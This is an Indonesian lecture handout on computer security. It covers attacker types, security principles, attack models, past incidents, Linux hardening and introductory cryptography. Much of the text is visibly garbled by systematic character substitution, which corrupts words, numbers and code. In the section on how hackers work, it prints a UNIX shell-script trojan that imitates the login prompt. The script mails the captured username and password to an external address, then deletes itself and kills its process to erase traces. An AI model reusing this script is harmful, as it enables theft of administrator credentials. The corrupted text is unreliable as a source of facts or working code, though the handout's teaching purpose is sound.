Keamanan Komputer

DIKTAT KULIAH KEAMANAN KOMPUTER

PENDAHULUAN Modal dasar : Mengetahui Bahasa Pemrograman Menguasai pengetahuan perangkat keras dan perangkat lunak pengontrolnya (logika interfacing). Menguasai pengelolaan instalasi komputer. Menguasai dengan baik teori jaringan komputer ; protokol, infrastruktur, media komunikasi. Memahami cara kerja system operasi. Memiliki pikiran jahat ;!p Cara belajar : "ari buku!buku mengenai keamanan komputer cetakan, e!book, majalah!majalah#tabloid komputer edisi cetak maupun edisi online. $kses ke situs!situs re%ie& keamanan (contoh' &&&.cert.org ), situs!situs underground (silahkan cari %ia search engine). Pelajari re%ie& atau manual book perangkat keras dan perangkat lunak untuk memahami cara kerja dengan baik. Keamanan Komputer Men apa d!butu"#an $ information-based society(, menyebabkan nilai informasi menjadi sangat penting dan menuntut kemampuan untuk mengakses dan menyediakan informasi secara cepat dan akurat menjadi sangat esensial bagi sebuah organisasi, )nfrastruktur *aringan komputer, seperti +$, dan )nternet, memungkinkan untuk menyediakan informasi secara cepat, sekaligus membuka potensi adanya lubang keamanan (security hole)

Keja"atan Komputer sema#!n men!n #at #arena : $plikasi bisnis berbasis -) dan jaringan komputer meningkat ' online banking, e!commerce, .lectronic data )nterchange (./)). /esentralisasi ser%er. -ransisi dari single %endor ke multi %endor. Meningkatnya kemampuan pemakai (user). 0esulitan penegak hokum dan belum adanya ketentuan yang pasti. 1emakin kompleksnya system yang digunakan, semakin besarnya source code program yang digunakan. Berhubungan dengan internet. Klas!%!#as! #eja"atan Komputer :

+e%el annoying

+e%el /angerous

Menurut /a%id )co%e 2*ohn /. 3o&ard, An Analysis Of Security Incidents On The Internet 1989 - 1994,( Ph/ thesis, .ngineering and Public Policy, "arnegie Mellon 5ni%ersity, 6778.9 berdasarkan lubang keamanan, keamanan dapat diklasifikasikan menjadi empat, yaitu' 1. Keamanan &an bers!%at %!s!# (physical security)' termasuk akses orang ke gedung, peralatan, dan media yang digunakan. "ontoh ' :iretapping atau hal!hal yang ber!hubungan dengan akses ke kabel atau komputer yang digunakan juga dapat dimasukkan ke dalam kelas ini. Denial of ser ice, dilakukan misalnya dengan mematikan peralatan atau membanjiri saluran komunikasi dengan pesan!pesan (yang dapat berisi apa saja karena yang diuta!makan adalah banyaknya jumlah pesan). Syn !lood Attack, dimana sistem (host) yang dituju dibanjiri oleh permintaan sehingga dia menjadi ter!lalu sibuk dan bahkan dapat berakibat macetnya sistem (hang). 2. Keamanan &an ber"ubun an den an oran 'personel), "ontoh ' )dentifikasi user (username dan pass&ord) Profil resiko dari orang yang mempunyai akses (pemakai dan pengelola).
3. 4.

Keamanan dar! data dan med!a serta te#n!# #omun!#as! (communications). Keamanan dalam operasi' $danya prosedur yang digunakan untuk mengatur dan mengelola sistem keamanan, dan juga ter!masuk prosedur setelah serangan (post attac" reco ery). 3al ' 6

Keamanan Komputer
Kara#ter!st!# Pen&usup : 6. -he "urious (1i )ngin -ahu) ! tipe penyusup ini pada dasarnya tertarik menemukan jenis sistem dan data yang anda miliki. ;. -he Malicious (1i Perusak) ! tipe penyusup ini berusaha untuk merusak sistem anda, atau merubah &eb page anda, atau sebaliknya membuat &aktu dan uang anda kembali pulih. <. -he 3igh!Profile )ntruder (1i Profil -inggi) ! tipe penyusup ini berusaha menggunakan sistem anda untuk memperoleh popularitas dan ketenaran. /ia mungkin menggunakan sistem profil tinggi anda untuk mengiklankan kemampuannya. =. -he "ompetition (1i Pesaing) ! tipe penyusup ini tertarik pada data yang anda miliki dalam sistem anda. )a mungkin seseorang yang beranggapan bah&a anda memiliki sesuatu yang dapat menguntungkannya secara keuangan atau sebaliknya. Ist!la" ba ! pen&usup : 6. Mundane ; tahu mengenai hacking tapi tidak mengetahui metode dan prosesnya. ;. lamer (script kiddies) ; mencoba script; yang pernah di buat oleh akti%is hacking, tapi tidak paham bagaimana cara membuatnya. <. &annabe ; paham sedikit metode hacking, dan sudah mulai berhasil menerobos sehingga berfalsafah ; 3$"0 )1 M> ?.+)@)A,. =. lar%a (ne&bie) ; hacker pemula, teknik hacking mulai dikuasai dengan baik, sering bereksperimen. 4. hacker ; akti%itas hacking sebagai profesi. B. &iCard ; hacker yang membuat komunitas pembelajaran di antara mereka. 8. guru ; master of the master hacker, lebih mengarah ke penciptaan tools!tools yang po&erfull yang salah satunya dapat menunjang akti%itas hacking, namun lebih jadi tools pemrograman system yang umum. A(PEK KEAMANAN KOMPUTER : Menurut @arfinkel 21imson @arfinkel, #$#% #retty $ood #ri acy,( A ?eilly D $ssoci!ates, )nc., 6774. 9 )* Pr!+a,& - Con%!dent!al!t& /efenisi ' menjaga informasi dari orang yang tidak berhak mengakses. Pri%acy ' lebih kearah data!data yang sifatnya pri%at , "ontoh ' e!mail seorang pemakai (user) tidak boleh dibaca oleh administrator. "onfidentiality ' berhubungan dengan data yang diberikan ke pihak lain untuk keperluan tertentu dan hanya diperbolehkan untuk keperluan tertentu tersebut. "ontoh ' data!data yang sifatnya pribadi (seperti nama, tempat tanggal lahir, social security number, agama, status perka&inan, penyakit yang pernah diderita, nomor kartu kredit, dan sebagainya) harus dapat diproteksi dalam penggunaan dan penyebarannya. Bentuk 1erangan ' usaha penyadapan (dengan program sniffer). 5saha!usaha yang dapat dilakukan untuk meningkatkan pri%acy dan confidentiality adalah dengan menggunakan teknologi kriptografi. Inte r!t& /efenisi ' informasi tidak boleh diubah tanpa seijin pemilik informasi. "ontoh ' e!mail di intercept di tengah jalan, diubah isinya, kemudian diteruskan ke alamat yang dituju. Bentuk serangan ' $danya %irus, tro&an horse, atau pemakai lain yang mengubah informasi tanpa ijin, Eman in the middle attack( dimana seseorang menempatkan diri di tengah pembicaraan dan menyamar sebagai orang lain. Aut"ent!,at!on /efenisi ' metoda untuk menyatakan bah&a informasi betul!betul asli, atau orang yang mengakses atau memberikan informasi adalah betul!betul orang yang dimaksud. /ukungan ' $danya -ools membuktikan keaslian dokumen, dapat dilakukan dengan teknologi &atermarking(untuk menjaga intellectual property(, yaitu dengan menandai dokumen atau hasil karya dengan Etanda tangan( pembuat ) dan digital signature. $ccess control, yaitu berkaitan dengan pembatasan orang yang dapat mengakses informasi. 5ser harus menggunakan pass&ord, biometric (ciri!ciri khas orang), dan sejenisnya. A+a!lab!l!t& /efenisi ' berhubungan dengan ketersediaan informasi ketika dibutuhkan. "ontoh hambatan ' 3al ' ;

Keamanan Komputer
denial of ser ice attack( (/o1 attack), dimana ser%er dikirimi permintaan (biasanya palsu) yang bertubi!tubi atau permintaan yang diluar perkiraan sehingga tidak dapat melayani permintaan lain atau bahkan sampai do'n, hang, crash. mailbomb, dimana seorang pemakai dikirimi e!mail bertubi!tubi (katakan ribuan e!mail) dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka e!mailnya atau kesulitan mengakses e!mailnya.

A,,ess Control /efenisi ' cara pengaturan akses kepada informasi. berhubungan dengan masalah authentication dan juga pri%acy Metode ' menggunakan kombinasi userid#pass&ord atau dengan menggunakan mekanisme lain. Non.repud!at!on /efenisi ' $spek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi. /ukungan bagi electronic commerce. (ECURIT/ ATTACK MODEL( Menurut :. 1tallings 2:illiam 1tallings, (et'or" and Internet'or" Security,( Prentice 3all, 6774.9 serangan (attack) terdiri dari ' Interruption: Perangkat sistem menjadi rusak atau tidak tersedia. 1erangan ditujukan kepada ketersediaan (a ailability) dari sistem. "ontoh serangan adalah Edenial of ser%ice attack(. Interception: Pihak yang tidak ber&enang berhasil mengakses asset atau informasi. "ontoh dari serangan ini adalah penyadapan ('iretapping). Modification: Pihak yang tidak ber&enang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. "ontoh dari serangan ini antara lain adalah mengubah isi dari &eb site dengan pesan!pesan yang merugikan pemilik &eb site. Fabrication: Pihak yang tidak ber&enang menyisipkan objek palsu ke dalam sistem. "ontoh dari serangan jenis ini adalah memasukkan pesan!pesan palsu seperti e!mail palsu ke dalam jaringan komputer.

(ECURIT/ 0REACH ACCIDENT 677B )*S* !ederal +omputer Incident ,esponse +apability (Fed")?") melaporkan bah&a lebih dari ;4GG Einsiden( di system komputer atau jaringan komputer yang disebabkan oleh gagalnya sistem keamanan atau adanya usaha untuk membobol sistem keamanan 677B !-I (ational +omputer +rimes S.uad, :ashington /."., memperkirakan kejahatan komputer yang terdeteksi kurang dari 64H, dan hanya 6GH dari angka itu yang dilaporkan 6778 Penelitian Deloitte Touch Tohmatsu menunjukkan bah&a dari <GG perusahaan di $ustralia, <8H (dua diantara lima) pernah mengalami masalah keamanan sistem komputernya. 677B )nggris, (++ Information Security -reaches Sur ey menunjukkan bah&a kejahatan komputer menaik ;GGH dari tahun 6774 ke 677B. 0erugian rata!rata 51 I<G.GGG # insiden. 677J FB) melaporkan bah&a kasus persidangan yang berhubungan dengan kejahatan komputer meroket 74GH dari tahun 677B ke tahun 6778, dengan penangkapan dari = ke =;, dan terbukti (con icted) di pengadilan naik JJH dari 6B ke <G kasus. /an lain!lain. /apat dilihat di &&&.cert.org "ontoh akibat dari jebolnya sistem keamanan, antara lain' 67JJ 0eamanan sistem mail sendmail dieksploitasi oleh ?obert -apan Morris sehingga melumpuhkan sistem )nternet. 0egiatan ini dapat diklasifikasikan sebagai denial of ser ice attack(. /iperkirakan biaya yang digunakan untuk memperbaiki dan hal!hal lain yang hilang adalah sekitar I6GG juta. /i tahun 677G Morris dihukum (con%icted) dan hanya didenda I6G.GGG. 1eorang hacker dari Massachusetts berhasil mematikan sistem telekomunikasi di sebuah airport local (:orcester, Massachusetts) sehingga mematikan komunikasi di control to&er dan menghalau pesa&at yang hendak mendarat. 3al ' <

6G Maret 6778

Keamanan Komputer
677G 6774 6774 ;GGG ;GGG ;GGG /ia juga mengacaukan sistem telepon di ?utland, Massachusetts. http'##&&&.ne&s.com#,e&s#)tem#-eKtonly#G,;4,;G;8J,GG.htmlLpf% 0e%in Poulsen mengambil alih system komputer telekomunikasi di +os $ngeles untuk memenangkan kuis di sebuah radio local. 0e%in Mitnick, mencuri ;G.GGG nomor kartu kredit, menyalin system operasi /." secara illegal dan mengambil alih hubungan telpon di ,e& >ork dan "alifornia. Mladimir +e%in membobol bank!bank di ka&asan :allstreet, mengambil uang sebesar I6G juta. Fabian "lone menjebol situs aetna.co.id dan *akarta mail dan membuat directory atas namanya berisi peringatan terhadap administrator situs tersebut. Beberapa &eb site )ndonesia sudah dijebol dan daftarnya (beserta contoh halaman yang sudah dijebol) dapat dilihat di koleksi Nhttp'##&&&.;BGG.comO :enas, membuat ser%er sebuah )1P di singapura do&n

MEMAHAMI HACKER 0EKER1A 1ecara umum melalui tahapan!tahapan sebagai berikut ' 6. -ahap mencari tahu system komputer sasaran. ;. -ahap penyusupan <. -ahap penjelajahan =. -ahap keluar dan menghilangkan jejak. "ontoh kasus -rojan 3ouse, memanfaatkan 13.++ script 5,)P ' Seoran/ /adis canti" dan /enit peserta "uliah )(I0 di sebuah per/uruan tin//i memili"i potensi memancin/ pen/elola sistem "omputer (administrator peme/an/ account root * * * hmmm1 yan/ len/ah* Ia melapor"an bah'a "omputer tempat ia mela"u"an tu/as-tu/as )(I0 yan/ diberi"an tida" dapat diper/una"an* San/ pen/elola sistem "omputer tentu sa&a den/an /a/ah per"asa in/in menun&u""an "e"uasaan seba/ai administrator )(I0* 23ell4 ini soal "ecil* 5un/"in pass'ord "amu "e blo"ir4 biar saya perbai"i dari tempat "amu24 u&ar administrator )(I0 sombon/ sambil dudu" disebelah /adis canti" dan /enit peserta "uliah tersebut* 6eeso"an harinya4 ter&adilah "e"acauan di sistem )(I0 "arena didu/a ter&adi penyusupan oleh hac"er termasu" &u/a hompepa/e per/uruan tin//i tersebut di-obo"-obo"4 ma"lum pen/elolanya masih sama* Selan&utnya piha" per/uruan tin//i men/eluar"an press release bah'a homepa/e mere"a di&ebol oleh hac"er dari 7uar (e/eri * * * * hihiii ,ah sebenarnya apa sih yang terjadi L 1ederhana, gadis cantik dan genit peserta kuliah 5,)P tersebut menggunakan program kecil myQlogin dalam bentuk shell script yang menyerupai layar login dan pass&ord sistem 5,)P sebagai berikut' RS#bin#sh RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR R ,ama program ' myQlogin R /eskripsi 'Program kuda trojan sederhana R %ersi 6.G ,opember 6777 RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR "A5,-.?TG "at #etc#issue :hile 2 UI"A5,-.?U Vne ; 9 do let "A5,-.?TI"A)5,-.?W6 echo Ulogin' XcU read +A@), stty echo echo Upass&ord' XcU read P$11:A?/ echo U5ser I+A@), ' IP$11:A?/U Y mail gadisZcompany.com stty echo echo echo U+ogin )ncorrectU done rm IG kill V7 IPP)/ $pabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya a&al penggunaan komputer pdaa sistem 5,)P' 3al ' =

Keamanan Komputer
+ogin' Pass&ord' +ihatlah, $dministrator 5,)P yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bah&a ini merupakan layar tipuan. +ayar login ini tidak terlihat beda dibanding layar login sesungguhnya. 1eperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. 1etelah diisi pass&ord dan di enter,maka segera timbul pesan +ogin'root Pass&ord' [[[[[[[[ +ogin )ncorrect -entu saja $dministrator 5,)P akan kaget bah&a pass&ordnya ternyata (seolah!olah) salah. 5ntuk itu ia segera mengulangi login dan pass&ord. 1etelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar 5,)P. Perhatikan program di atas baik!baik, sekali pemakai tersebut mencoba login dan mengisi pass&ord pada layar di atas, setelah itu maka otomatis data login dan pass&ord tersebut akan di email ke mailto'hackerZcompany.com. 1ampai disini maka si gadis lugu dan genit telah mendapatkan login dan pass&ord . . . ia ternyata seorang hacker SS :alaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas L). Proses ini dilakukan pada ; baris terakhir dari program myQlogin di atas, yaitu rm IG kill V7 IPP)/ yang artinya akan segera dilakukan proses penghapusan program myQlogin dan hapus pula )/ dari proses. /engan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. /itambah lagi penghapusan terhadap jejak proses di dalam sistem 5,)P. \ap . . . hilang sudah tanda!tanda bah&a hacker nya ternyata seorang gadis peserta kuliahnya. 1ukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. 3acker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini. PRIN(IP DA(AR PERANCAN2AN (I(TEM /AN2 AMAN 6. Mencegah hilangnya data ;. Mencegah masuknya penyusup LAPI(AN KEAMANAN : 6. +apisan Fisik ' membatasi akses fisik ke mesin ' o $kses masuk ke ruangan komputer o penguncian komputer secara hard&are o keamanan B)A1 o keamanan Bootloader back!up data ' o pemilihan piranti back!up o penjad&alan back!up mendeteksi gangguan fisik ' log file ' +og pendek atau tidak lengkap, +og yang berisikan &aktu yang aneh, +og dengan permisi atau kepemilikan yang tidak tepat, "atatan pelayanan reboot atau restart, +og yang hilang, masukan su atau login dari tempat yang janggal mengontrol akses sumber daya. ;. 0eamanan lokal Berkaitan dengan user dan hak!haknya ' Beri mereka fasilitas minimal yang diperlukan. 3ati!hati terhadap saat#dari mana mereka login, atau tempat seharusnya mereka login. Pastikan dan hapus rekening mereka ketika mereka tidak lagi membutuhkan akses. <. 0eamanan ?oot 0etika melakukan perintah yang kompleks, cobalah dalam cara yang tidak merusak dulu, terutama perintah yang menggunakan globbing' contoh, anda ingin melakukan Urm foo[.bakU, pertama coba dulu' Uls foo[.bakU dan pastikan anda ingin menghapus file!file yang anda pikirkan. 3al ' 4

Keamanan Komputer
Beberapa orang merasa terbantu ketika melakukan Utouch #!iU pada sistem mereka. 3al ini akan membuat perintah! perintah seperti ' Urm !fr [U menanyakan apakah anda benar!benar ingin menghapus seluruh file. (1hell anda menguraikan U!iU dulu, dan memberlakukannya sebagai option !i ke rm). 3anya menjadi root ketika melakukan tugas tunggal tertentu. *ika anda berusaha mengetahui bagaimana melakukan sesuatu, kembali ke shell pemakai normal hingga anda yakin apa yang perlu dilakukan oleh root. *alur perintah untuk pemakai root sangat penting. *alur perintah, atau %ariabel lingkungan P$-3 mendefinisikan lokal yang dicari shell untuk program. "obalah dan batasi jalur perintah bagi pemakai root sedapat mungkin, dan jangan pernah menggunakan ].], yang berarti ]direktori saat ini], dalam pernyataan P$-3 anda. 1ebagai tambahan, jangan pernah menaruh direktori yang dapat ditulis pada jalur pencarian anda, karena hal ini memungkinkan penyerang memodifikasi atau menaruh file biner dalam jalur pencarian anda, yang memungkinkan mereka menjadi root ketika anda menjalankan perintah tersebut. *angan pernah menggunakan seperangkat utilitas rlogin#rsh#reKec (disebut utilitas r) sebagai root. Mereka menjadi sasaran banyak serangan, dan sangat berbahaya bila dijalankan sebagai root. *angan membuat file .rhosts untuk root. File #etc#securetty berisikan daftar terminal!terminal tempat root dapat login. 1ecara baku (pada ?ed3at +inuK) diset hanya pada konsol %irtual lokal (%ty). Berhati!hatilah saat menambahkan yang lain ke file ini. $nda seharusnya login dari jarak jauh sebagai pemakai biasa dan kemudian ]su] jika anda butuh (mudah!mudahan melalui ssh atau saluran terenkripsi lain), sehingga tidak perlu untuk login secara langsung sebagai root. 1elalu perlahan dan berhati!hati ketika menjadi root. -indakan anda dapat mempengaruhi banyak hal. Pikir sebelum anda mengetikS =. 0eamanan File dan system file /irectory home user tidak boleh mengakses perintah mengubah system seperti partisi, perubahan de%ice dan lain!lain. +akukan setting limit system file. $tur akses dan permission file ' read, &rita, eKecute bagi user maupun group. 1elalu cek program!program yang tidak dikenal 4. 0eamanan Pass&ord dan .nkripsi 3ati!hati terhadap bruto force attack dengan membuat pass&ord yang baik. 1elalu mengenkripsi file yang dipertukarkan. +akukan pengamanan pada le%el tampilan, seperti screen sa%er. B. 0eamanan 0ernel selalu update kernel system operasi. )kuti re%ie& bugs dan kekurang!kekurangan pada system operasi. 8. 0eamanan *aringan :aspadai paket sniffer yang sering menyadap port .thernet. +akukan prosedur untuk mengecek integritas data Merifikasi informasi /,1 +indungi net&ork file system @unakan fire&all untuk barrier antara jaringan pri%at dengan jaringan eksternal

KRIPTO2RA3I DE3ENI(I +rypto/raphy adalah suatu ilmu ataupun seni mengamankan pesan, dan dilakukan oleh crypto/rapher. +ryptanalysis adalah suatu ilmu dan seni membuka (breaking) cipherteKt dan orang yang melakukannya disebut cryptanalyst. ELEMEN

CR/PTO(/(TEM +rypto/raphic system atau cryptosystem adalah suatu fasilitas untuk mengkon%ersikan plainteKt ke cipherteKt dan sebaliknya. /alam sistem ini, seperangkat parameter yang menentukan transformasi pencipheran tertentu disebut suatu set kunci. Proses enkripsi dan dekripsi diatur oleh satu atau beberapa kunci kriptografi. )* Kr!pto ra%! dapat memenu"! #ebutu"an umum suatu transa#s!: 6. 0erahasiaan (confidentiality) dijamin dengan melakukan enkripsi (penyandian). ;. 0eutuhan (inte/rity) atas data!data pembayaran dilakukan dengan fungsi hash satu arah. 3al ' B

Keamanan Komputer
<. =. *aminan atas identitas dan keabsahan (authenticity) pihak!pihak yang melakukan transaksi dilakukan dengan menggunakan pass'ord atau sertifikat digital. 1edangkan keotentikan data transaksi dapat dilakukan dengan tanda tangan digital. -ransaksi dapat dijadikan barang bukti yang tidak bisa disangkal (non-repudiation) dengan memanfaatkan tanda tangan digital dan sertifikat digital.

4* Kara#ter!st!# ,r&ptos&tem &an ba!# seba a! ber!#ut : 6. 0eamanan sistem terletak pada kerahasiaan kunci dan bukan pada kerahasiaan algoritma yang digunakan. ;. "ryptosystem yang baik memiliki ruang kunci (keyspace) yang besar. <. "ryptosystem yang baik akan menghasilkan cipherteKt yang terlihat acak dalam seluruh tes statistik yang dilakukan terhadapnya. =. "ryptosystem yang baik mampu menahan seluruh serangan yang telah dikenal sebelumnya 5* MACAM CR/PTO(/(TEM A* (&mmetr!, Cr&ptos&stem /alam symmetric cryptosystem ini, kunci yang digunakan untuk proses enkripsi dan dekripsi pada prinsipnya identik, tetapi satu buah kunci dapat pula diturunkan dari kunci yang lainnya. 0unci!kunci ini harus dirahasiakan. Aleh karena itulah sistem ini sering disebut sebagai secret-"ey ciphersystem. *umlah kunci yang dibutuhkan umumnya adalah '
n

"; T n . (n!6) !!!!!!!! ;

dengan n menyatakan banyaknya pengguna. "ontoh dari sistem ini adalah /ata .ncryption 1tandard (/.1), Blo&fish, )/.$. 0* Ass&mmetr!, Cr&ptos&stem /alam assymmetric cryptosystem ini digunakan dua buah kunci. 1atu kunci yang disebut kunci publik (public "ey) dapat dipublikasikan, sedang kunci yang lain yang disebut kunci pri%at (pri ate "ey) harus dirahasiakan. Proses menggunakan sistem ini dapat diterangkan secara sederhana sebagai berikut ' bila $ ingin mengirimkan pesan kepada B, $ dapat menyandikan pesannya dengan menggunakan kunci publik B, dan bila B ingin membaca surat tersebut, ia perlu mendekripsikan surat itu dengan kunci pri%atnya. /engan demikian kedua belah pihak dapat menjamin asal surat serta keaslian surat tersebut, karena adanya mekanisme ini. "ontoh sistem ini antara lain ?1$ 1cheme dan Merkle!3ellman 1cheme. 6* PROTOKOL CR/PTO(/(TEM "ryptographic protocol adalah suatu protokol yang menggunakan kriptografi. Protokol ini melibatkan sejumlah algoritma kriptografi, namun secara umum tujuan protokol lebih dari sekedar kerahasiaan. Pihak!pihak yang berpartisipasi mungkin saja ingin membagi sebagian rahasianya untuk menghitung sebuah nilai, menghasilkan urutan random, atau pun menandatangani kontrak secara bersamaan. Penggunaan kriptografi dalam sebuah protokol terutama ditujukan untuk mencegah atau pun mendeteksi adanya ea esdroppin/ dan cheatin/. 7* 1ENI( PEN/ERAN2AN PADA PROTOKOL "ipherteKt!only attack. /alam penyerangan ini, seorang cryptanalyst memiliki cipherteKt dari sejumlah pesan yang seluruhnya telah dienkripsi menggunakan algoritma yang sama. 0no&n!plainteKt attack. /alam tipe penyerangan ini, cryptanalyst memiliki akses tidak hanya ke cipherteKt sejumlah pesan, namun ia juga memiliki plainteKt pesan!pesan tersebut. "hosen!plainteKt attack. Pada penyerangan ini, cryptanalyst tidak hanya memiliki akses atas cipherteKt dan plainteKt untuk beberapa pesan, tetapi ia juga dapat memilih plainteKt yang dienkripsi. $dapti%e!chosen!plainteKt attack. Penyerangan tipe ini merupakan suatu kasus khusus chosen!plainteKt attack. "ryptanalyst tidak hanya dapat memilih plainteKt yang dienkripsi, ia pun memiliki kemampuan untuk memodifikasi pilihan berdasarkan hasil enkripsi sebelumnya. /alam chosen!plainteKt attack, cryptanalyst mungkin hanya dapat memiliki plainteKt dalam suatu blok besar untuk dienkripsi; dalam adapti%e!chosen!plainteKt attack ini ia dapat memilih blok plainteKt yang lebih kecil dan kemudian memilih yang lain berdasarkan hasil yang pertama, proses ini dapat dilakukannya terus menerus hingga ia dapat memperoleh seluruh informasi. "hosen!cipherteKt attack. Pada tipe ini, cryptanalyst dapat memilih cipherteKt yang berbeda untuk didekripsi dan memiliki akses atas plainteKt yang didekripsi. "hosen!key attack. "ryptanalyst pada tipe penyerangan ini memiliki pengetahuan tentang hubungan antara kunci! kunci yang berbeda. ?ubber!hose cryptanalysis. Pada tipe penyerangan ini, cryptanalyst mengancam, memeras, atau bahkan memaksa seseorang hingga mereka memberikan kuncinya. 3al ' 8

Keamanan Komputer
8* 1ENI( PEN/ERAN2AN PADA 1ALUR KOMUNIKA(I Sniffin/' secara harafiah berarti mengendus, tentunya dalam hal ini yang diendus adalah pesan (baik yang belum ataupun sudah dienkripsi) dalam suatu saluran komunikasi. 3al ini umum terjadi pada saluran publik yang tidak aman. 1ang pengendus dapat merekam pembicaraan yang terjadi. ,eplay attac" 2/3MM 7B9' *ika seseorang bisa merekam pesan!pesan handsha"e (persiapan komunikasi), ia mungkin dapat mengulang pesan!pesan yang telah direkamnya untuk menipu salah satu pihak. Spoofin/ 2/3MM 7B9' Penyerang V misalnya Maman V bisa menyamar menjadi $nto. 1emua orang dibuat percaya bah&a Maman adalah $nto. Penyerang berusaha meyakinkan pihak!pihak lain bah&a tak ada salah dengan komunikasi yang dilakukan, padahal komunikasi itu dilakukan dengan sang penipu#penyerang. "ontohnya jika orang memasukkan P), ke dalam mesin $-M palsu V yang benar!benar dibuat seperti $-M asli V tentu sang penipu bisa mendapatkan P),!nya dan copy pita magentik kartu $-M milik sang nasabah. Pihak bank tidak tahu bah&a telah terjadi kejahatan. 5an-in-the-middle 21chn 7B9' *ika spoofin/ terkadang hanya menipu satu pihak, maka dalam skenario ini, saat $nto hendak berkomunikasi dengan Badu, Maman di mata $nto seolah!olah adalah Badu, dan Maman dapat pula menipu Badu sehingga Maman seolah!olah adalah $nto. Maman dapat berkuasa penuh atas jalur komunikas ini, dan bisa membuat berita fitnah. METODE CR/PTO2RA3I )* METODE KUNO a. =84 1.M. bangsa 1parta, suatu bangsa militer pada jaman >unani kuno, menggunakan teknik kriptografi yang disebut scytale, untuk kepentingan perang. 1cytale terbuat dari tongkat dengan papyrus yang mengelilinginya secara spiral. 0unci dari scytale adalah diameter tongkat yang digunakan oleh pengirim harus sama dengan diameter tongkat yang dimiliki oleh penerima pesan, sehingga pesan yang disembunyikan dalam papyrus dapat dibaca dan dimengerti oleh penerima.

b. *ulius "aesar, seorang kaisar terkenal ?oma&i yang menaklukkan banyak bangsa di .ropa dan -imur -engah juga menggunakan suatu teknik kriptografi yang sekarang disebut "aesar cipher untuk berkorespondensi sekitar tahun BG 1.M. -eknik yang digunakan oleh 1ang "aesar adalah mensubstitusikan alfabet secara beraturan, yaitu oleh alfabet ketiga yang mengikutinya, misalnya, alfabet $U digantikan oleh U/U, UBU oleh U.U, dan seterusnya. 1ebagai contoh, suatu pesan berikut '

@ambar ;. "aesar "ipher /engan aturan yang dibuat oleh *ulius "aesar tersebut, pesan sebenarnya adalah UPenjarakan panglima di%isi ke tujuh segeraU. 4* TEKNIK DA(AR KRIPTO2RA3I a* (ubst!tus! 1alah satu contoh teknik ini adalah "aesar cipher yang telah dicontohkan diatas. +angkah pertama adalah membuat suatu tabel substitusi. -abel substitusi dapat dibuat sesuka hati, dengan catatan bah&a penerima pesan memiliki tabel yang sama untuk keperluan dekripsi. Bila tabel substitusi dibuat secara acak, akan semakin sulit pemecahan cipherteKt oleh orang yang tidak berhak. $!B!"!/!.!F!@!3!)!*!0!+!M!,!A!P!^!?!1!-!5!M!:!P!>!\!6!;!<!=!4!B!8!J!7!G!.!, 3al ' J

Keamanan Komputer
B!F!6!0!^!@!$!-!P!*!B!3!>!/!;!P!4!M!M!8!"!J!=!)!7!,!?!.!5!<!+!1!:!,!.!A!\!G @ambar <. -abel 1ubstitusi -abel substitusi diatas dibuat secara acak. /engan menggunakan tabel tersebut, dari plainteKt U4 teknik dasar kriptografiU dihasilkan cipherteKt U+ 8^B/PB 0BMBM BMPP8;$MB@PU. /engan menggunakan tabel substitusi yang sama secara dengan arah yang terbalik (re%erse), plainteKt dapat diperoleh kembali dari cipherteKt!nya. b* 0lo,#!n 1istem enkripsi terkadang membagi plainteKt menjadi blok!blok yang terdiri dari beberapa karakter yang kemudian dienkripsikan secara independen. PlainteKt yang dienkripsikan dengan menggunakan teknik blocking adalah '
B+A0 6 B+A0 ; B+A0 < B+A0 = B+A0 4 B+A0 B B+A0 8

@ambar =. .nkripsi dengan Blocking /engan menggunakan enkripsi blocking dipilih jumlah lajur dan kolom untuk penulisan pesan. *umlah lajur atau kolom menjadi kunci bagi kriptografi dengan teknik ini. PlainteKt dituliskan secara %ertikal ke ba&ah berurutan pada lajur, dan dilanjutkan pada kolom berikutnya sampai seluruhnya tertulis. "ipherteKt!nya adalah hasil pembacaan plainteKt secara horiContal berurutan sesuai dengan blok!nya. *adi cipherteKt yang dihasilkan dengan teknik ini adalah U40 @ 0?-/?$.$)F01P),$- )?AU. PlainteKt dapat pula ditulis secara horiContal dan cipherteKtnya adalah hasil pembacaan secara %ertikal. ,* Permutas! 1alah satu teknik enkripsi yang terpenting adalah permutasi atau sering juga disebut transposisi. -eknik ini memindahkan atau merotasikan karakter dengan aturan tertentu. Prinsipnya adalah berla&anan dengan teknik substitusi. /alam teknik substitusi, karakter berada pada posisi yang tetap tapi identitasnya yang diacak. Pada teknik permutasi, identitas karakternya tetap, namun posisinya yang diacak. 1ebelum dilakukan permutasi, umumnya plainteKt terlebih dahulu dibagi menjadi blok!blok dengan panjang yang sama. 5ntuk contoh diatas, plainteKt akan dibagi menjadi blok!blok yang terdiri dari B karakter, dengan aturan permutasi sebagai berikut '

@ambar 4. Permutasi /engan menggunakan aturan diatas, maka proses enkripsi dengan permutasi dari plainteKt adalah sebagai berikut '

@ambar B. Proses .nkripsi dengan Permutasi 3al ' 7

Keamanan Komputer
"ipherteKt yang dihasilkan dengan teknik permutasi ini adalah U, .-04 10/ $))?0 ?$$-@A?P F)U. d* E#spans! 1uatu metode sederhana untuk mengacak pesan adalah dengan memelarkan pesan itu dengan aturan tertentu. 1alah satu contoh penggunaan teknik ini adalah dengan meletakkan huruf konsonan atau bilangan ganjil yang menjadi a&al dari suatu kata di akhir kata itu dan menambahkan akhiran UanU. Bila suatu kata dimulai dengan huruf %okal atau bilangan genap, ditambahkan akhiran UiU. Proses enkripsi dengan cara ekspansi terhadap plainteKt terjadi sebagai berikut '

